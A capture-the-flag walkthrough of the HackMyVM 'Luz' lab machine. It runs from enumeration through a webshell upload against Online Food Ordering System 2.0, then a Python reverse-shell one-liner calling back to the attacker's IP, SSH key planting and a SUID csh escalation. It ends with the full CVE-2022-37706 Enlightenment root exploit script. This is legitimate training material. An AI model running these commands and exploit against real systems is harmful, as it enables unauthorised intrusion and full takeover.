			ENUMERATION


---nmap---

┌──(root㉿kali)-[/home/okina]
└─# nmap 10.0.2.66 -sS -sC -sV -A -T4 -p-    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-23 15:28 +03
Nmap scan report for 10.0.2.66
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 5f:9e:28:74:86:8e:d7:5b:bd:96:00:4b:d0:7f:56:e3 (ECDSA)
|_  256 fb:3b:fd:9c:9f:4a:7c:8c:1e:a8:27:e2:8d:bf:2b:e5 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: nginx/1.18.0 (Ubuntu)
MAC Address: 08:00:27:37:FB:78 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.03 ms 10.0.2.66

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.95 seconds
                                           


---not much on the website---


---let's run a gobuster scan---

                                             
┌──(root㉿kali)-[/home/okina]
└─# gobuster dir -u http://10.0.2.66 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,txt,php,jpg 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.2.66
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,jpg
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/about.php            (Status: 200) [Size: 637]
/index.php            (Status: 200) [Size: 19059]
/home.php             (Status: 200) [Size: 8979]
/login.php            (Status: 200) [Size: 1579]
/header.php           (Status: 200) [Size: 1780]
/signup.php           (Status: 200) [Size: 2034]
/admin                (Status: 301) [Size: 178] [--> http://10.0.2.66/admin/]
/assets               (Status: 301) [Size: 178] [--> http://10.0.2.66/assets/]
/footer.php           (Status: 200) [Size: 2862]
/css                  (Status: 301) [Size: 178] [--> http://10.0.2.66/css/]
/database             (Status: 301) [Size: 178] [--> http://10.0.2.66/database/]
/js                   (Status: 301) [Size: 178] [--> http://10.0.2.66/js/]
/head.php             (Status: 200) [Size: 0]
/checkout.php         (Status: 500) [Size: 0]
/readme.txt           (Status: 200) [Size: 1531]
Progress: 978928 / 1102805 (88.77%)^Z
zsh: suspended  gobuster dir -u http://10.0.2.66 -w  -x html,txt,php,jpg
                                      


---I found a login page and admin page, I run a scan on admin page also---


---We are not allowed to access the pages that we found, on the admin login page I see
Online Food Ordering System v2--- 



---Let's check if there are any sploits for it---


┌──(root㉿kali)-[/home/okina]
└─# searchsploit Online Food Ordering System
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Online Food Delivery 2.04 - Authentication By | php/webapps/41029.txt
Online Food Ordering System 1.0 - Remote Code | php/webapps/48827.txt
Online Food Ordering System 2.0 -  Remote Cod | php/webapps/50305.py
Simple Online Food Ordering System 1.0 - 'id' | php/webapps/48829.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results


---there is a sploit, 50305, let's download it---


┌──(root㉿kali)-[/home/…/Desktop/NOTLAR/HACKMYVM/37- LUZ LINUX CTF]
└─# searchsploit -m 50305            
  Exploit: Online Food Ordering System 2.0 -  Remote Code Execution (RCE) (Unauthenticated)
      URL: https://www.exploit-db.com/exploits/50305
     Path: /usr/share/exploitdb/exploits/php/webapps/50305.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/okina/Desktop/NOTLAR/HACKMYVM/37- LUZ LINUX CTF/50305.py



                                                                               
┌──(root㉿kali)-[/home/…/Desktop/NOTLAR/HACKMYVM/37- LUZ LINUX CTF]
└─# cat 50305.py                                   
# Exploit Title: Online Food Ordering System 2.0 -  Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: 2021-09-20
# Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip
# Version: 2.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Online Food Ordering System 2.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.

# Exploit Details:

# 1. Access the 'admin/ajax.php', as it does not check for an authenticated user session.
# 2. Set the 'action' parameter of the POST request to 'save_settings'.
#     - `ajax.php?action=save_settings`
# 3. Capture request in burp and replace with with following request.

'''
POST /fos/admin/ajax.php?action=save_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------120025571041714278883588636251
Content-Length: 754
Origin: http://localhost
Connection: close
Referer: http://localhost/fos/admin/index.php?page=site_settings
Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
.
.
.
.



---looks like this exploit accesses admin/ajax.php as there is no authentication and then exploits it,
capturing the result using burp---


---let's run it---

                               
┌──(root㉿kali)-[/home/…/Desktop/NOTLAR/HACKMYVM/37- LUZ LINUX CTF]
└─# python3 50305.py
               Online Food Ordering System v2.0
            Unauthenticated Remote Code Execution
               Abdullah "hax.3xploit" Khawaja


        ______ _______                         ________
        ___  //_/__  /_______ ___      _______ ______(_)_____ _
        __  ,<  __  __ \  __ `/_ | /| / /  __ `/____  /_  __ `/
        _  /| | _  / / / /_/ /__ |/ |/ // /_/ /____  / / /_/ /
        /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___  /  \__,_/
                                               /___/
                    abdullahkhawaja.com
            
Enter URL of The Vulnarable Application : http://10.0.2.66/
[*]Uploading PHP Shell For RCE...
[+]PHP Shell has been uploaded successfully! 
[+] Successfully connected to webshell.
CD%> python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.0.2.54",1234));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

Exiting.
                 

---it opens a shell in the target machine but I want a more stable connection so I use a python reverse shell
and set up my listener---


                

			GAINING FOOTHOLD

               
┌──(root㉿kali)-[/home/okina]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.0.2.54] from (UNKNOWN) [10.0.2.66] 37190
www-data@luz:~/html/fos/assets/img$ cd /home
cd /home


---we are in as the www-data but don't have much permissions so I look for ways to upgrade my station---



www-data@luz:/home$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_system
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/bsd-csh
/usr/bin/fusermount3


---I notice enlightenment_ckpasswd and /usr/bin/bsd-csh, lets use the latter one, we will use the former
one also---


---I check gtfobins and find a possible priv escalate vector for csh---

./csh -b


---so let's use it---


 
www-data@luz:/home$ /usr/bin/bsd-csh -b
/usr/bin/bsd-csh -b
% whoami
whoami
aelis
% 

---now we are the user aelis with better privileges, let's keep on looking---



% ls -la
ls -la
total 12172
drwxr-x--- 5 aelis aelis     4096 May 22 17:38 .
drwxr-xr-x 3 root  root      4096 Jan 11  2023 ..
-rw------- 1 aelis aelis       49 Jan 11  2023 .Xauthority
lrwxrwxrwx 1 aelis aelis        9 Jan 11  2023 .bash_history -> /dev/null
-rw-r--r-- 1 aelis aelis      220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 aelis aelis     3771 Jan  6  2022 .bashrc
drwx------ 2 aelis aelis     4096 Jan 11  2023 .cache
drwxrwxr-x 3 aelis aelis     4096 Jan 11  2023 .local
-rw-r--r-- 1 aelis aelis      807 Jan  6  2022 .profile
drwx------ 2 aelis aelis     4096 Jan 11  2023 .ssh
-rw-r--r-- 1 aelis aelis        0 Jan 11  2023 .sudo_as_admin_successful
-rw-r--r-- 1 aelis aelis 12421945 Jan 11  2023 php-fos-db.zip


---I download php-fos to my own machine, unzip it but the contents doesn't give me anything, let's keep
going---



---we also discovered that there is .ssh folder, and there is authorized_keys for it, so we can create
public and private keys, upload our public key into the system and try to log in to the ssh system using the 
private key we created---


                                                                                
┌──(root㉿kali)-[/home/…/Desktop/NOTLAR/HACKMYVM/37- LUZ LINUX CTF]
└─# mkdir .ssh
                                                                                
┌──(root㉿kali)-[/home/…/Desktop/NOTLAR/HACKMYVM/37- LUZ LINUX CTF]
└─# cd .ssh 
                                                                                
┌──(root㉿kali)-[/home/…/NOTLAR/HACKMYVM/37- LUZ LINUX CTF/.ssh]
└─# ssh-keygen -t rsa      
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): luz
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in luz
Your public key has been saved in luz.pub
The key fingerprint is:
SHA256:lDtNBBp4Ap4Np8NEp/dHP2yHRF7D5oCGqU1COFv7qIk root@kali
The key's randomart image is:
+---[RSA 3072]----+
| .=++..o.oo.o    |
| +oO= =oo=..o.   |
|  B+oO..+ ++     |
|  .oo..o B ..    |
|     o. S B .    |
|    . .. o o     |
| . o             |
|E o              |
|                 |
+----[SHA256]-----+
                         


---now that it is created, copy the public key---


┌──(root㉿kali)-[/home/…/NOTLAR/HACKMYVM/37- LUZ LINUX CTF/.ssh]
└─# cat luz.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChPCn8QFbCAGJpi0h+HFtYqDqo8Yi2g9hxfiRU28E6TR83g2KSTp6K7JTKBhXY0yA2qxJRGX/cMeTmZ+vSBATbOKXt6rkBXQzaskxSmo8ToDVn5gZxY6Pea+BKZWE9ywislzzNfaIZiG9vGu4A6mFTl9QJ62s8ASeiuNs5LYMsQBs/J4CtvOBcnDTp7fn7KwF0u836cxFAXbrMrTGeCiRwzjAGOZxxWb4RidG7swPu1lx75fmMj/sLfi8hZ7SHeIQVFtnbHMedL/0f7h0xHYpR+V9Mb8+cMJd0j9WtiwYJw0aenZQqLe3HASAVPLdW50BrNXyqZNY7ABClIrZXPdUKcClVqXnKK4r86Ol1jjAdzhrVxPCMpIR9IwNqFm41bJlc553jCE1WurxZPEtA0ARGy1OrhHHuM4dLufzDfCOW1LPcyitxQV1nD9ExsR08VvAPgimT7lY9WAWKr56F+HzsKqTj8yBQqjQ1NMNNm5r3ilzqAsRf5ytDL7jL+yjkB/s= root@kali



---I copy this and paste it into aelis's .ssh folder overwriting the "authorized_keys", then I will log into 
ssh as her using my own private key, after all the public and private key are a match :) --- 


% ls -la
ls -la
total 12168
drwxr-x--- 5 aelis aelis     4096 Jan 11  2023 .
drwxr-xr-x 3 root  root      4096 Jan 11  2023 ..
-rw------- 1 aelis aelis       49 Jan 11  2023 .Xauthority
lrwxrwxrwx 1 aelis aelis        9 Jan 11  2023 .bash_history -> /dev/null
-rw-r--r-- 1 aelis aelis      220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 aelis aelis     3771 Jan  6  2022 .bashrc
drwx------ 2 aelis aelis     4096 Jan 11  2023 .cache
drwxrwxr-x 3 aelis aelis     4096 Jan 11  2023 .local
-rw-r--r-- 1 aelis aelis      807 Jan  6  2022 .profile
drwx------ 2 aelis aelis     4096 Jan 11  2023 .ssh
-rw-r--r-- 1 aelis aelis        0 Jan 11  2023 .sudo_as_admin_successful
-rw-r--r-- 1 aelis aelis 12421945 Jan 11  2023 php-fos-db.zip

% cd .ssh
cd .ssh
% ls
ls
authorized_keys



echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChPCn8QFbCAGJpi0h+HFtYqDqo8Yi2g9hxfiRU28E6TR83g2KSTp6K7JTKBhXY0yA2qxJRGX/cMeTmZ+vSBATbOKXt6rkBXQzaskxSmo8ToDVn5gZxY6Pea+BKZWE9ywislzzNfaIZiG9vGu4A6mFTl9QJ62s8ASeiuNs5LYMsQBs/J4CtvOBcnDTp7fn7KwF0u836cxFAXbrMrTGeCiRwzjAGOZxxWb4RidG7swPu1lx75fmMj/sLfi8hZ7SHeIQVFtnbHMedL/0f7h0xHYpR+V9Mb8+cMJd0j9WtiwYJw0aenZQqLe3HASAVPLdW50BrNXyqZNY7ABClIrZXPdUKcClVqXnKK4r86Ol1jjAdzhrVxPCMpIR9IwNqFm41bJlc553jCE1WurxZPEtA0ARGy1OrhHHuM4dLufzDfCOW1LPcyitxQV1nD9ExsR08VvAPgimT7lY9WAWKr56F+HzsKqTj8yBQqjQ1NMNNm5r3ilzqAsRf5ytDL7jL+yjkB/s= root@kali' > authorized_keys
         

---Note: If this doesn't work then just delete the keys folder, write the line above in a text editor and paste 
it into the terminal---

                                                                             
┌──(root㉿kali)-[/home/…/NOTLAR/HACKMYVM/37- LUZ LINUX CTF/.ssh]
└─# ssh -i id_rsa aelis@10.0.2.66                      
The authenticity of host '10.0.2.66 (10.0.2.66)' can't be established.
ED25519 key fingerprint is SHA256:zJ98VzyiXBPwPbYm8Ka23HQda6fosh/uoEbrEkCKYhE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.66' (ED25519) to the list of known hosts.

*** System restart required ***
Last login: Thu Jan 12 07:30:36 2023
aelis@luz:~$ 


---we are in, we can look for the user flag, I couldn't find it at first so I will just become root and
search for it then :) ---




			PRIVILEGE ESCALATION



---we can check for the exploit we found earlier "enlightenment_ckpasswd" search for it online---



---found an exploit CVE-2022-37706-LPE-exploit, go to source code---




---in the ssh service go to the aelis's home directory, create a .sh file and copy this code into it---

#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

 
aelis@luz:~$ nano exploit.sh
aelis@luz:~$ ls
exploit.sh  php-fos-db.zip

aelis@luz:~$ chmod +x exploit.sh 


aelis@luz:~$ ./exploit.sh 
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.


# whoami
root


---these scripts make it easy you should read their content to understand and then write it yourself, don't
be a script kiddie, I am also talking to myself---


# cd /root
# ls
root.txt  snap
# cat root.txt
---Root User Flag---



---Now the user flag, let's find it---

# find / -name user.txt 2>/dev/null
/var/www/html/user.txt

# cd /var/www/html
# ls
fos  user.txt
# cat user.txt	
---First User Flag---


---We got both the flags, congrats---


